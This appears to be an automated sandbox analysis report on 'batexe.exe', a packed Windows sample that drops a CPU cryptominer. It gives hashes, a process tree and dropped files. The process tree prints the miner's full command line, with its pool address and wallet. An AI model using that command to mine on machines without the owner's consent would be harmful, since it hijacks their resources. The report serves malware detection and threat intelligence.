73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
296s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12/02/2024, 14:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2252	b2e.exe
824	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
824	cpuminer-sse2.exe
824	cpuminer-sse2.exe
824	cpuminer-sse2.exe
824	cpuminer-sse2.exe
824	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3936-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3936 wrote to memory of 2252	3936	batexe.exe	75
PID 3936 wrote to memory of 2252	3936	batexe.exe	75
PID 3936 wrote to memory of 2252	3936	batexe.exe	75
PID 2252 wrote to memory of 2696	2252	b2e.exe	76
PID 2252 wrote to memory of 2696	2252	b2e.exe	76
PID 2252 wrote to memory of 2696	2252	b2e.exe	76
PID 2696 wrote to memory of 824	2696	cmd.exe	79
PID 2696 wrote to memory of 824	2696	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3936
- C:\Users\Admin\AppData\Local\Temp\A27A.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\A27A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\A27A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A45E.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A27A.tmp\b2e.exe

Filesize
2.6MB

MD5
f845d6b8c0beb43591f7ebc96344f81b

SHA1
5bcb9d96f6589b559060e11d6d5a0bf73d91c80e

SHA256
841b8431f27f5e631d37c605530e6ce5430559c96fa9a6ddebc7e9dd63ad04b2

SHA512
8de293211ad14117c9ecb797c78c738c91b691f3dc861401d537cc72c9ba05a40340c452938bd6d72bf400efa1fffb7bb387f204035697b8a229a29288d5d357

Download Submit
C:\Users\Admin\AppData\Local\Temp\A27A.tmp\b2e.exe

Filesize
2.5MB

MD5
d1bb6a27576b9fe20f6b6db95d54b13f

SHA1
e8094975baf23d1bcb23264b85e60e69ddc90a19

SHA256
65c73ad6f652dd8f0692e92336b757e13bc51bfe8058f6468e0b46f4e513858d

SHA512
c0e4ee2bcc0f0ff411fe272a9ff845fc8cff017d11edb4bd1b40c1071e10645add7f0fd0c783c7e9782b193c0ec8cbe5ccc8720903119fdf56b16a0d111794f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\A45E.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
195KB

MD5
419b338059b37cfd55fbe8799e6a971c

SHA1
0115ce9045ab2ed881dd7beb93fc36c183d3ef82

SHA256
871e9471d022ec899a5a5e9380ac170da1aea7965e6458878a9a62013bdb5838

SHA512
df54ecf16aea5fdea71f06468d7777e75cab052fc65882c094360dbc1830462c28ebd69dd40eba019aa6d3fa9b5907cf5c8bddbba6e724924c89a046520038f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
298KB

MD5
961c2062cf067ddb2f0815b0b3c6c02d

SHA1
333ac7055fd4bb549f763d84ae17f259a6e76141

SHA256
dc185cf09a67501d549b4c985b32d5149aba773b6e93ca722a0d3fb79cf1d01b

SHA512
9caeef7109bbf525a7ba3e4ad21bddf227f50da483d2be75022562abda987cb0a4cf57ef1a874edfd723d59d3744321c7c8eb56e6f209a72a1da0a3030e0cf2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
260KB

MD5
58bf8785292be1238c98d11c0c0b60e0

SHA1
b2918202693cd2977456fec5a6a03ad3dfb418d5

SHA256
6473e018c82516eb1ce6fafb241f2e51c841fcd3493b2ab74cfec7e411c0e793

SHA512
5d6a4c9f06ccb854c0b6b789257433502e70d854956bb665f9c4de03e578f6ae35874a9b9a7a59a9be0f2785b88849b437f4841ca54040e108ce9b1d016dfbcc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
244KB

MD5
6f4e838e4930d9c4c8f8c1ef6c554629

SHA1
bea9011b47417c67eb7de0f02145e0954d236a2e

SHA256
8ab29cabe48195d0a843e6d1ed4184bc7a660bf792fb2e9f1f61e2bb55b5b948

SHA512
8ffb9c348571f5a7c2be0395bc054d0e9ef760f3892686dbc1a9f54568291eb0b5c9155e2d0e90de86e824bd66023155ebf628518523839dc97edd484d7d8504

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
297KB

MD5
b2cce30b2a29325e2e5144730af13c4b

SHA1
cde5d4d99592bd9b97eeb3a60cac1245c95f1bba

SHA256
cb12ccd44a0fdd6679c07e1454ac17d00a421262f0990796a8cc9b804639dc61

SHA512
17d95fedf184dd6850818c5bea93358a1876e644da6df66feb3d5922288792632c259277ebb7a48d6fafa85e01dd2320fb9b5e59abd2399fd5ebf38ff9e2075a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
162KB

MD5
f037e5384bd5f10d2a65a37d52e53eae

SHA1
99ffa31cf7c5e7507a10556abd817042a96fd726

SHA256
3a5a0fd4f6bb0f8347871c3c90617ffea295769e4dfc309cb7839c45206cb4ac

SHA512
184b5b123723f920d4e1bc679633dc0d86ba8aa27021effd63c23e79bc61b79f084b84d15619448bfee5eec45b5c5aca8999379128c54bd71969ecdc906881c6

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
121KB

MD5
7e5e4bea4363af68af71456bf05529c0

SHA1
963ff492b02282ca5e23a9466dc8f53323a6c05d

SHA256
50390837c543fa984d8336538a127738401e358641753ed7dd28ca0ff3b4812d

SHA512
b83c849601980ba7f70036ae6c1b5e975eb6c97896cbc9474c0d2532f294b60e837315fea7c7b69e8626a9103bb4b4ff8eb4b0ecd4f67eaf589654a5e6b34c89

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
236KB

MD5
c1b0a549be04a0032d88d0d3cf190363

SHA1
34cb717d7bce175a9a43c0f9d4c57b1c03c24892

SHA256
2447c5cbb8cecc1778c5eec404c94ccb0ae54f3dd61a91540ae6c8f3004ecf5b

SHA512
cbee7db4977ff7aaf9c952d5cc7b4a33c14f56d53301589075672d5ae7f93cd4d7ffbebc4b4b4ad7c8dda99a325b1503a59020b4964c2645d45db4d64c198aeb

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
216KB

MD5
87fae508628afa61330b473018c65360

SHA1
a4e2db488f9b4077634b40929b0c69a0dc9ec425

SHA256
181b05cad2fff1fdb66cd1956989220b443cfd25d27ea21d0adad359a9c35498

SHA512
0b9ca47723247606617427d9dfb5fe00074ece2282177ed34d6b57d355badf531115375abac6b05562e617a728ce4f2dc3442d581ef606b1c46f99074b8beb50

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
204KB

MD5
91df6f2ee7db3c9170ccf83dff976623

SHA1
8893094b4a441e298fdec67855906310784a6280

SHA256
dddf1c7345374a948bdae25417d791b3b839de8d224972e3fa06e064289d2c70

SHA512
7578e3f90e75a1c07358103df4103aa815c909777604711d346132b11c39ab89d6dfd44dd1b4b23686bdc153da3779443ee36d47558dda65ab2d5b58937b23cb

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
141KB

MD5
5d94e647076073631c1ad1f2531ee1b8

SHA1
01347d8c033e0a72fbc19b7c7daa51101439cb5f

SHA256
20aefed3136f63e36f82ed7b33eb6bf93909129c1ce9a255d1531cf80894288f

SHA512
d385caf95a2d2cbf00bda77cb19093f1600e6aa89e2f265ae89df904f663227bebc50b48d4c550acbdaaa190ac2920a1e86cb6d4e4534a34907a83e66366cd53

Download Submit
memory/824-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/824-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/824-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/824-42-0x000000005FC70000-0x000000005FD08000-memory.dmp

Filesize
608KB

Download
memory/824-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/824-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/824-44-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/824-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/824-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/824-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/824-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/824-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/824-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/824-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2252-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2252-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3936-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download